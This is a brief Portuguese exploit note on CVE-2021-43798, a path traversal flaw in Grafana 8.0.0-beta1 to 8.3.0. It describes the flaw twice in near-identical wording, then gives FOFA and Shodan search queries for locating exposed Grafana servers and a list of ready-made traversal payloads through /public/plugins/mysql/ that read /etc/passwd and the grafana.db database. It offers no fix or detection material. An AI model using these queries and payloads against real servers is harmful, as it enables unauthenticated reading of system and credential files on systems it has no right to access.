
CVE-2021-43798 é uma vulnerabilidade de alta gravidade de travessia de caminho (pontuação CVSS 3.1: 7.5) que afeta as versões 8.0.0-beta1 a 8.3.0 do Grafana. Ela permite que atacantes não autenticados leiam arquivos arbitrários do servidor ao explorar a sanitização inadequada no endpoint /public/plugins/:pluginId
CVE-2021-43798 é uma vulnerabilidade de path traversal de alta gravidade (pontuação CVSS 3.1: 7.5) que afeta as versões do Grafana 8.0.0-beta1 até 8.3.0. Permite que atacantes não autenticados leiam arquivos arbitrários do servidor ao explorar a sanitização inadequada no endpoint /public/plugins/:pluginId
dork :
fofa : title="Grafana" && port="3000" shodan : http.title:"Grafana" port:3000
payload :
/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd /public/plugins/mysql/../../../../../../../../../../../../etc/passwd /public/plugins/mysql/../../../../../../../../../../../../var/lib/grafana/grafana.db /public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fgrafana%2Fgrafana.db